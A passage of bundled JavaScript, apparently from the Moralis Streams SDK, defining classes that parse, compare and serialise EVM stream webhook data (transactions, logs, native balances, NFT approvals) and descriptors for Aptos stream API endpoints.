            triggers: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.triggers, function(triggers) {
                return triggers.map(function(trigger) {
                    return $be177b42cca18859$export$537c1481727bf198.create(trigger);
                });
            })
        });
    };
    /**
     * Compares two StreamEvmTransaction data. It checks a deep equality check of both values.
     * @param valueA - the first StreamEvmTransactionish data to compare
     * @param valueB - the second StreamEvmTransactionish data to compare
     * @returns true if the values are equal, false otherwise
     * @example
     * ```ts
     *  StreamEvmTransaction.equals(valueA, valueB);
     * ```
     */ StreamEvmTransaction.equals = function(valueA, valueB) {
        var _a, _b;
        var transactionA = StreamEvmTransaction.create(valueA);
        var transactionB = StreamEvmTransaction.create(valueB);
        if (!transactionA.chain.equals(transactionB.chain)) return false;
        if (transactionA.hash !== transactionB.hash) return false;
        if (((_a = transactionA.triggers) === null || _a === void 0 ? void 0 : _a.length) !== ((_b = transactionB.triggers) === null || _b === void 0 ? void 0 : _b.length) || !$be177b42cca18859$export$537c1481727bf198.arrayEquals(transactionA.triggers || [], transactionB.triggers || [])) return false;
        return true;
    };
    /**
     * Compares an StreamEvmTransactionish data to this StreamEvmTransaction instance.
     * @param value - the value to compare
     * @returns true if the value is equal to the current instance, false otherwise
     * @example
     * ```ts
     * transaction.equals(value);
     * ```
     */ StreamEvmTransaction.prototype.equals = function(value) {
        return StreamEvmTransaction.equals(this, value);
    };
    /**
     * Converts the StreamEvmTransaction instance to a JSON object.
     * @returns JSON object of the StreamEvmTransaction instance
     * @example `transaction.toJSON()`
     */ StreamEvmTransaction.prototype.toJSON = function() {
        var _a = this._data, chain = _a.chain, gas = _a.gas, gasPrice = _a.gasPrice, nonce = _a.nonce, fromAddress = _a.fromAddress, toAddress = _a.toAddress, value = _a.value, receiptContractAddress = _a.receiptContractAddress, receiptCumulativeGasUsed = _a.receiptCumulativeGasUsed, receiptGasUsed = _a.receiptGasUsed, signature = _a.signature, triggers = _a.triggers, data = $be177b42cca18859$var$__rest(_a, [
            "chain",
            "gas",
            "gasPrice",
            "nonce",
            "fromAddress",
            "toAddress",
            "value",
            "receiptContractAddress",
            "receiptCumulativeGasUsed",
            "receiptGasUsed",
            "signature",
            "triggers"
        ]);
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            chain: chain.toJSON(),
            gas: gas === null || gas === void 0 ? void 0 : gas.toString(),
            gasPrice: gasPrice === null || gasPrice === void 0 ? void 0 : gasPrice.toString(),
            nonce: nonce === null || nonce === void 0 ? void 0 : nonce.toString(),
            fromAddress: fromAddress.toJSON(),
            toAddress: toAddress === null || toAddress === void 0 ? void 0 : toAddress.toJSON(),
            value: value === null || value === void 0 ? void 0 : value.toString(),
            receiptCumulativeGasUsed: receiptCumulativeGasUsed === null || receiptCumulativeGasUsed === void 0 ? void 0 : receiptCumulativeGasUsed.toString(),
            receiptGasUsed: receiptGasUsed === null || receiptGasUsed === void 0 ? void 0 : receiptGasUsed.toString(),
            receiptContractAddress: receiptContractAddress === null || receiptContractAddress === void 0 ? void 0 : receiptContractAddress.toJSON(),
            r: signature === null || signature === void 0 ? void 0 : signature.r,
            s: signature === null || signature === void 0 ? void 0 : signature.s,
            v: signature === null || signature === void 0 ? void 0 : signature.v,
            triggers: triggers === null || triggers === void 0 ? void 0 : triggers.map(function(trigger) {
                return trigger.format();
            })
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ StreamEvmTransaction.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(StreamEvmTransaction.prototype, "chain", {
        get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransaction.prototype, "input", {
        get: function() {
            return this._data.input;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransaction.prototype, "transactionIndex", {
        get: function() {
            return this._data.transactionIndex;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransaction.prototype, "fromAddress", {
        get: function() {
            return this._data.fromAddress;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransaction.prototype, "toAddress", {
        get: function() {
            return this._data.toAddress;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransaction.prototype, "receiptGasUsed", {
        get: function() {
            return this._data.receiptGasUsed;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransaction.prototype, "receiptCumulativeGasUsed", {
        get: function() {
            return this._data.receiptCumulativeGasUsed;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransaction.prototype, "receiptContractAddress", {
        get: function() {
            return this._data.receiptContractAddress;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransaction.prototype, "signature", {
        get: function() {
            return this._data.signature;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransaction.prototype, "r", {
        get: function() {
            var _a;
            return (_a = this.signature) === null || _a === void 0 ? void 0 : _a.r;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransaction.prototype, "s", {
        get: function() {
            var _a;
            return (_a = this.signature) === null || _a === void 0 ? void 0 : _a.s;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransaction.prototype, "v", {
        get: function() {
            var _a;
            return (_a = this.signature) === null || _a === void 0 ? void 0 : _a.v;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransaction.prototype, "hash", {
        get: function() {
            return this._data.hash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransaction.prototype, "gas", {
        get: function() {
            return this._data.gas;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransaction.prototype, "gasPrice", {
        get: function() {
            return this._data.gasPrice;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransaction.prototype, "nonce", {
        get: function() {
            return this._data.nonce;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransaction.prototype, "value", {
        get: function() {
            return this._data.value;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransaction.prototype, "type", {
        get: function() {
            return this._data.type;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransaction.prototype, "receiptRoot", {
        get: function() {
            return this._data.receiptRoot;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransaction.prototype, "receiptStatus", {
        get: function() {
            return this._data.receiptStatus;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransaction.prototype, "triggers", {
        get: function() {
            return this._data.triggers;
        },
        enumerable: false,
        configurable: true
    });
    return StreamEvmTransaction;
}();
/**
 * The StreamEvmTransactionLog class is a representation of a transaction log that is returned by the Moralis Stream API
 *
 * @category DataType
 */ var $be177b42cca18859$export$f104683f1c2ce30a = /** @class */ function() {
    function StreamEvmTransactionLog(_a) {
        var data = $be177b42cca18859$var$__rest(_a, []);
        this._data = StreamEvmTransactionLog.parse(data);
    }
    /**
     * Create a new instance of StreamEvmTransactionLog
     *
     * @param data - the StreamEvmTransactionLogish type
     * @example
     * ```ts
     * const transactionLog = StreamEvmTransactionLog.create(data);
     * ```
     * @returns an instance of StreamEvmTransactionLog
     */ StreamEvmTransactionLog.create = function(data) {
        if (data instanceof StreamEvmTransactionLog) return data;
        return new StreamEvmTransactionLog(data);
    };
    StreamEvmTransactionLog.parse = function(data) {
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            chain: (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).create(data.chain),
            logIndex: +data.logIndex,
            address: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(data.address),
            topic0: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.topic0),
            topic1: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.topic1),
            topic2: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.topic2),
            topic3: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.topic3),
            triggers: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.triggers, function(triggers) {
                return triggers.map(function(trigger) {
                    return $be177b42cca18859$export$537c1481727bf198.create(trigger);
                });
            })
        });
    };
    /**
     * Compares two StreamEvmTransactionLog data. It checks a deep equality check of both values.
     * @param valueA - the first StreamEvmTransactionLogish data to compare
     * @param valueB - the second StreamEvmTransactionLogish data to compare
     * @returns true if the values are equal, false otherwise
     * @example
     * ```ts
     *  StreamEvmTransactionLog.equals(valueA, valueB);
     * ```
     */ StreamEvmTransactionLog.equals = function(valueA, valueB) {
        var _a, _b;
        var transactionLogA = StreamEvmTransactionLog.create(valueA);
        var transactionLogB = StreamEvmTransactionLog.create(valueB);
        if (!transactionLogA.chain.equals(transactionLogB.chain)) return false;
        if (transactionLogA.transactionHash !== transactionLogB.transactionHash) return false;
        if (transactionLogA.logIndex !== transactionLogB.logIndex) return false;
        if (((_a = transactionLogA.triggers) === null || _a === void 0 ? void 0 : _a.length) !== ((_b = transactionLogB.triggers) === null || _b === void 0 ? void 0 : _b.length) || !$be177b42cca18859$export$537c1481727bf198.arrayEquals(transactionLogA.triggers || [], transactionLogB.triggers || [])) return false;
        return true;
    };
    /**
     * Compares an StreamEvmTransactionLogish data to this StreamEvmTransactionLog instance.
     * @param value - the value to compare
     * @returns true if the value is equal to the current instance, false otherwise
     * @example
     * ```ts
     * transactionLog.equals(value);
     * ```
     */ StreamEvmTransactionLog.prototype.equals = function(value) {
        return StreamEvmTransactionLog.equals(this, value);
    };
    /**
     * Converts the StreamEvmTransactionLog instance to a JSON object.
     * @returns JSON object of the StreamEvmTransactionLog instance
     * @example `transactionLog.toJSON()`
     */ StreamEvmTransactionLog.prototype.toJSON = function() {
        var _a = this._data, chain = _a.chain, address = _a.address, triggers = _a.triggers, data = $be177b42cca18859$var$__rest(_a, [
            "chain",
            "address",
            "triggers"
        ]);
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            chain: chain.toJSON(),
            address: address.toJSON(),
            triggers: triggers === null || triggers === void 0 ? void 0 : triggers.map(function(trigger) {
                return trigger.format();
            })
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ StreamEvmTransactionLog.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(StreamEvmTransactionLog.prototype, "chain", {
        get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransactionLog.prototype, "logIndex", {
        get: function() {
            return this._data.logIndex;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransactionLog.prototype, "transactionHash", {
        get: function() {
            return this._data.transactionHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransactionLog.prototype, "address", {
        get: function() {
            return this._data.address;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransactionLog.prototype, "data", {
        get: function() {
            return this._data.data;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransactionLog.prototype, "topic0", {
        get: function() {
            return this._data.topic0;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransactionLog.prototype, "topic1", {
        get: function() {
            return this._data.topic1;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransactionLog.prototype, "topic2", {
        get: function() {
            return this._data.topic2;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransactionLog.prototype, "topic3", {
        get: function() {
            return this._data.topic3;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmTransactionLog.prototype, "triggers", {
        get: function() {
            return this._data.triggers;
        },
        enumerable: false,
        configurable: true
    });
    return StreamEvmTransactionLog;
}();
/**
 * The NativeBalance class is a representation of a nativeBalance-address pair
 *
 * @category DataType
 */ var $be177b42cca18859$var$StreamNativeBalance = /** @class */ function() {
    function StreamNativeBalance(data) {
        this._data = StreamNativeBalance.parse(data);
    }
    StreamNativeBalance.create = function(data) {
        if (data instanceof StreamNativeBalance) return data;
        return new StreamNativeBalance(data);
    };
    StreamNativeBalance.parse = function(input) {
        return {
            address: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(input.address),
            balance: (0, $3dfc2d9370ba0cd1$export$62862bdd1f71aa78).create(input.balance, "wei")
        };
    };
    StreamNativeBalance.equals = function(valueA, valueB) {
        var nativeBalanceTriggerA = StreamNativeBalance.create(valueA);
        var nativeBalanceTriggerB = StreamNativeBalance.create(valueB);
        return nativeBalanceTriggerA.address.equals(nativeBalanceTriggerB.address) && nativeBalanceTriggerA.balance.equals(nativeBalanceTriggerB.balance);
    };
    /**
     * Compares an NativeBalance data to this NativeBalance instance.
     * @param value - the value to compare
     * @returns true if the value is equal to the current instance, false otherwise
     * @example
     * ```ts
     * nativeBalanceTrigger.equals(value);
     * ```
     */ StreamNativeBalance.prototype.equals = function(value) {
        return StreamNativeBalance.equals(this, value);
    };
    /**
     * Converts the NativeBalance instance to a JSON object.
     * @returns JSON object of the NativeBalance instance
     * @example `nativeBalanceTrigger.toJSON()`
     */ StreamNativeBalance.prototype.toJSON = function() {
        var _a = this._data, address = _a.address, balance = _a.balance;
        return {
            address: address.toJSON(),
            balance: balance.format()
        };
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ StreamNativeBalance.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(StreamNativeBalance.prototype, "address", {
        get: function() {
            return this._data.address;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamNativeBalance.prototype, "balance", {
        get: function() {
            return this._data.balance;
        },
        enumerable: false,
        configurable: true
    });
    return StreamNativeBalance;
}();
/**
 * The `StreamEvmNftTokenApproval` class is a representation of the NFT approval data.
 *
 * @category DataType
 */ var $be177b42cca18859$export$f8ad9a3eec5c74ff = /** @class */ function() {
    function StreamEvmNftTokenApproval(data) {
        this.data = data;
    }
    StreamEvmNftTokenApproval.create = function(data) {
        var chain = (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).create(data.chain);
        return new StreamEvmNftTokenApproval($be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            chain: chain
        }));
    };
    Object.defineProperty(StreamEvmNftTokenApproval.prototype, "chain", {
        get: function() {
            return this.data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTokenApproval.prototype, "contract", {
        get: function() {
            return this.data.contract;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTokenApproval.prototype, "account", {
        get: function() {
            return this.data.account;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTokenApproval.prototype, "operator", {
        get: function() {
            return this.data.operator;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTokenApproval.prototype, "approvedAll", {
        get: function() {
            return this.data.approvedAll;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTokenApproval.prototype, "tokenId", {
        get: function() {
            return this.data.tokenId;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTokenApproval.prototype, "transactionHash", {
        get: function() {
            return this.data.transactionHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTokenApproval.prototype, "logIndex", {
        get: function() {
            return this.data.logIndex;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTokenApproval.prototype, "tokenContractType", {
        get: function() {
            return this.data.tokenContractType;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTokenApproval.prototype, "tokenName", {
        get: function() {
            return this.data.tokenName;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamEvmNftTokenApproval.prototype, "tokenSymbol", {
        get: function() {
            return this.data.tokenSymbol;
        },
        enumerable: false,
        configurable: true
    });
    StreamEvmNftTokenApproval.prototype.toJSON = function() {
        return {
            chain: this.chain.toJSON(),
            contract: this.contract,
            account: this.account,
            operator: this.operator,
            approvedAll: this.approvedAll,
            tokenId: this.tokenId,
            transactionHash: this.transactionHash,
            logIndex: this.logIndex,
            tokenContractType: this.tokenContractType,
            tokenName: this.tokenName,
            tokenSymbol: this.tokenSymbol
        };
    };
    StreamEvmNftTokenApproval.prototype.format = function() {
        return this.toJSON();
    };
    // eslint-disable-next-line complexity
    StreamEvmNftTokenApproval.prototype.equals = function(value) {
        return this.contract === value.contract && this.account === value.account && this.operator === value.operator && this.approvedAll === value.approvedAll && this.tokenId === value.tokenId && this.transactionHash === value.transactionHash && this.logIndex === value.logIndex && this.tokenContractType === value.tokenContractType && this.tokenName === value.tokenName && this.tokenSymbol === value.tokenSymbol;
    };
    return StreamEvmNftTokenApproval;
}();
var $be177b42cca18859$var$EvmStreamResultParser = /** @class */ function() {
    function EvmStreamResultParser() {}
    EvmStreamResultParser.parseChainId = function(value) {
        // Only needed for the initial test-response where we get an empty string as chain
        return value === "" ? (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).ETHEREUM : (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).create(value);
    };
    EvmStreamResultParser.parseErc20Transfers = function(value, chain) {
        return value.map(function(transfer) {
            return $be177b42cca18859$export$7077c9e8a71a2f1.create($be177b42cca18859$var$__assign({
                chain: chain
            }, transfer));
        });
    };
    EvmStreamResultParser.parseErc20Approvals = function(value, chain) {
        return value.map(function(approval) {
            return $be177b42cca18859$export$d4b26dff8d4d9eef.create($be177b42cca18859$var$__assign({
                chain: chain
            }, approval));
        });
    };
    EvmStreamResultParser.parseNftTransfers = function(value, chain) {
        return value.map(function(transfer) {
            return $be177b42cca18859$export$f5b671948b53bfb3.create($be177b42cca18859$var$__assign({
                chain: chain
            }, transfer));
        });
    };
    EvmStreamResultParser.parseNftApprovals = function(value, chain) {
        return {
            ERC721: value.ERC721.map(function(approval) {
                return $be177b42cca18859$export$15cc38286d624288.create($be177b42cca18859$var$__assign({
                    chain: chain
                }, approval));
            }),
            ERC1155: value.ERC1155.map(function(approval) {
                return $be177b42cca18859$export$f142dae0321d08be.create($be177b42cca18859$var$__assign({
                    chain: chain
                }, approval));
            })
        };
    };
    EvmStreamResultParser.parseNftTokenApprovals = function(values, chain) {
        return values.map(function(value) {
            return $be177b42cca18859$export$f8ad9a3eec5c74ff.create($be177b42cca18859$var$__assign({
                chain: chain
            }, value));
        });
    };
    EvmStreamResultParser.parseBlock = function(value, chain) {
        if (value.number === "") return (0, $3dfc2d9370ba0cd1$export$6de1c0cb8e5a3274).create({
            chain: chain,
            number: 0,
            hash: "",
            timestamp: "0"
        });
        return (0, $3dfc2d9370ba0cd1$export$6de1c0cb8e5a3274).create($be177b42cca18859$var$__assign({
            chain: chain
        }, value));
    };
    EvmStreamResultParser.parseLogs = function(value, chain) {
        return value.map(function(log) {
            return $be177b42cca18859$export$f104683f1c2ce30a.create($be177b42cca18859$var$__assign({
                chain: chain
            }, log));
        });
    };
    EvmStreamResultParser.parseTransactions = function(value, chain) {
        return value.map(function(transaction) {
            return $be177b42cca18859$export$41f3983c34968df8.create($be177b42cca18859$var$__assign({
                chain: chain
            }, transaction));
        });
    };
    EvmStreamResultParser.parseInternalTransactions = function(value, chain) {
        return value.map(function(transaction) {
            return $be177b42cca18859$export$bfeceda31b34f56e.create($be177b42cca18859$var$__assign({
                chain: chain
            }, transaction));
        });
    };
    EvmStreamResultParser.parseNativeBalances = function(value) {
        return value.map(function(nativeBalance) {
            return $be177b42cca18859$var$StreamNativeBalance.create(nativeBalance);
        });
    };
    var _a;
    _a = EvmStreamResultParser;
    EvmStreamResultParser.parse = function(value) {
        var chain = _a.parseChainId(value.chainId);
        return {
            chain: chain,
            erc20Transfers: _a.parseErc20Transfers(value.erc20Transfers, chain),
            erc20Approvals: _a.parseErc20Approvals(value.erc20Approvals, chain),
            nftTransfers: _a.parseNftTransfers(value.nftTransfers, chain),
            nftApprovals: _a.parseNftApprovals(value.nftApprovals, chain),
            ntfTokenApprovals: _a.parseNftTokenApprovals(value.nftTokenApprovals, chain),
            block: _a.parseBlock(value.block, chain),
            logs: _a.parseLogs(value.logs, chain),
            txs: _a.parseTransactions(value.txs, chain),
            txsInternal: _a.parseInternalTransactions(value.txsInternal, chain),
            abi: value.abi,
            retries: value.retries,
            confirmed: value.confirmed,
            streamId: value.streamId,
            tag: value.tag,
            nativeBalances: _a.parseNativeBalances(value.nativeBalances)
        };
    };
    return EvmStreamResultParser;
}();
/**
 * The EvmStreamResult class is representation of the webhook data that is returned from the Stream api
 *
 * @category DataType
 */ var $be177b42cca18859$export$e8d24cc4b28b4466 = /** @class */ function() {
    function EvmStreamResult(data) {
        this._data = EvmStreamResult.parse(data);
    }
    /**
     * Create a new instance of EvmStreamResult
     *
     * @param data - the EvmStreamResultish type
     * @param core - the Core instance
     * @example
     * ```ts
     * const evmStreamResult = EvmStreamResult.create(data);
     * ```
     * @returns an instance of EvmStreamResult
     */ EvmStreamResult.create = function(data) {
        if (data instanceof EvmStreamResult) return data;
        return new EvmStreamResult(data);
    };
    /**
     * Compares two EvmStreamResult data. It checks a deep equality check of both values.
     * @param valueA - the first EvmStreamResultish data to compare
     * @param valueB - the second EvmStreamResultish data to compare
     * @returns true if the values are equal, false otherwise
     * @example
     * ```ts
     *  EvmStreamResult.equals(valueA, valueB);
     * ```
     */ EvmStreamResult.equals = function(valueA, valueB) {
        var evmStreamResultA = EvmStreamResult.create(valueA);
        var evmStreamResultB = EvmStreamResult.create(valueB);
        if (!evmStreamResultA.chain.equals(evmStreamResultB.chain)) return false;
        if (!evmStreamResultA.block.equals(evmStreamResultB.block)) return false;
        if (evmStreamResultA.streamId !== evmStreamResultB.streamId) return false;
        if (evmStreamResultA.tag !== evmStreamResultB.tag) return false;
        if (evmStreamResultA.confirmed !== evmStreamResultB.confirmed) return false;
        return true;
    };
    /**
     * Compares an EvmStreamResultish data to this EvmStreamResult instance.
     * @param value - the value to compare
     * @returns true if the value is equal to the current instance, false otherwise
     * @example
     * ```ts
     * evmStreamResult.equals(value);
     * ```
     */ EvmStreamResult.prototype.equals = function(value) {
        return EvmStreamResult.equals(this, value);
    };
    /**
     * Converts the EvmStreamResult instance to a JSON object.
     * @returns JSON object of the EvmStreamResult instance
     * @example `evmStreamResult.toJSON()`
     */ EvmStreamResult.prototype.toJSON = function() {
        return $be177b42cca18859$var$EvmStreamResultFormatter.toJSON(this._data);
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ EvmStreamResult.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(EvmStreamResult.prototype, "abiInterface", {
        get: function() {
            if (!this.abi || !this.abi.length) return null;
            return new (0, $ef97d5c3a9a93354$export$48cefb51a4e315b2)(this.abi);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStreamResult.prototype, "decodedLogs", {
        get: function() {
            var abiInterface = this.abiInterface;
            if (!abiInterface) return [];
            return this.logs.map(function(log) {
                return abiInterface.parseLog({
                    data: log.data,
                    topics: [
                        log.topic0,
                        log.topic1,
                        log.topic2,
                        log.topic3
                    ].filter($be177b42cca18859$var$isNotEmpty)
                });
            });
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStreamResult.prototype, "chain", {
        get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStreamResult.prototype, "streamId", {
        get: function() {
            return this._data.streamId;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStreamResult.prototype, "tag", {
        get: function() {
            return this._data.tag;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStreamResult.prototype, "block", {
        get: function() {
            return this._data.block;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStreamResult.prototype, "retries", {
        get: function() {
            return this._data.retries;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStreamResult.prototype, "confirmed", {
        get: function() {
            return this._data.confirmed;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStreamResult.prototype, "erc20Approvals", {
        get: function() {
            return this._data.erc20Approvals;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStreamResult.prototype, "erc20Transfers", {
        get: function() {
            return this._data.erc20Transfers;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStreamResult.prototype, "logs", {
        get: function() {
            return this._data.logs;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStreamResult.prototype, "nftApprovals", {
        /**
         * @deprecated Use `ntfTokenApprovals` instead. This property will be removed in the future.
         */ get: function() {
            return this._data.nftApprovals;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStreamResult.prototype, "ntfTokenApprovals", {
        get: function() {
            return this._data.ntfTokenApprovals;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStreamResult.prototype, "nftTransfers", {
        get: function() {
            return this._data.nftTransfers;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStreamResult.prototype, "txs", {
        get: function() {
            return this._data.txs;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStreamResult.prototype, "txsInternal", {
        get: function() {
            return this._data.txsInternal;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStreamResult.prototype, "abi", {
        get: function() {
            return this._data.abi;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStreamResult.prototype, "nativeBalances", {
        get: function() {
            return this._data.nativeBalances;
        },
        enumerable: false,
        configurable: true
    });
    EvmStreamResult.parse = function(data) {
        return $be177b42cca18859$var$EvmStreamResultParser.parse(data);
    };
    return EvmStreamResult;
}();
var $be177b42cca18859$var$isNotEmpty = function(value) {
    return value != null;
};
var $be177b42cca18859$export$35e2a8df834bde5c = {
    method: "POST",
    name: "addAddressAptos",
    id: "aptosStreamsAddAddresses",
    groupName: "aptosStreams",
    urlPathPattern: "/streams/aptos/{id}/address",
    bodyParamNames: [
        "address"
    ],
    urlPathParamNames: [
        "id"
    ],
    bodyType: "properties",
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$o,
    getRequestBody: $be177b42cca18859$var$getRequestBody$d,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$o,
    serializeRequest: $be177b42cca18859$var$serializeRequest$o,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$o
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$o(request) {
    return {
        id: request.id
    };
}
function $be177b42cca18859$var$getRequestBody$d(request) {
    return {
        address: Array.isArray(request.address) ? request.address.map(function(a) {
            return (0, $a7ef34a427d74c9c$export$4bf08dd0aef06cf6).create(a).address;
        }) : (0, $a7ef34a427d74c9c$export$4bf08dd0aef06cf6).create(request.address).address
    };
}
function $be177b42cca18859$var$deserializeResponse$o(jsonResponse) {
    var data = (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(jsonResponse);
    return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
        address: data.address ? typeof data.address === "string" ? (0, $a7ef34a427d74c9c$export$4bf08dd0aef06cf6).create(data.address) : data.address.map(function(address) {
            return (0, $a7ef34a427d74c9c$export$4bf08dd0aef06cf6).create(address);
        }) : undefined
    });
}
function $be177b42cca18859$var$serializeRequest$o(request) {
    return {
        id: request.id,
        address: Array.isArray(request.address) ? request.address.map(function(a) {
            return (0, $a7ef34a427d74c9c$export$4bf08dd0aef06cf6).create(a).address;
        }) : (0, $a7ef34a427d74c9c$export$4bf08dd0aef06cf6).create(request.address).address
    };
}
function $be177b42cca18859$var$deserializeRequest$o(jsonRequest) {
    return {
        id: jsonRequest.id,
        address: Array.isArray(jsonRequest.address) ? jsonRequest.address.map(function(a) {
            return (0, $a7ef34a427d74c9c$export$4bf08dd0aef06cf6).create(a);
        }) : (0, $a7ef34a427d74c9c$export$4bf08dd0aef06cf6).create(jsonRequest.address)
    };
}
var $be177b42cca18859$export$260bbd31693b2860 = {
    method: "GET",
    name: "getStreamsAptos",
    id: "aptosStreamsGetAll",
    groupName: "aptosStreams",
    urlSearchParamNames: [
        "cursor",
        "limit"
    ],
    urlPathPattern: "/streams/aptos",
    firstPageIndex: 0,
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$n,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$n,
    serializeRequest: $be177b42cca18859$var$serializeRequest$n,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$n
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$n(request) {
    return {
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        cursor: request.cursor
    };
}
function $be177b42cca18859$var$deserializeResponse$n(jsonResponse) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(stream) {
        return $be177b42cca18859$export$752ed3dd409f1f27.create(stream);
    });
}
function $be177b42cca18859$var$serializeRequest$n(request) {
    return {
        cursor: request.cursor,
        limit: request.limit
    };
}
function $be177b42cca18859$var$deserializeRequest$n(jsonRequest) {
    return {
        cursor: jsonRequest.cursor,
        limit: jsonRequest.limit
    };
}
var $be177b42cca18859$export$e3102e9186649228 = {
    method: "GET",
    name: "getStreamAptos",
    id: "aptosStreamsGet",
    groupName: "aptosStreams",
    urlPathPattern: "/streams/aptos/{id}",
    urlPathParamNames: [
        "id"
    ],
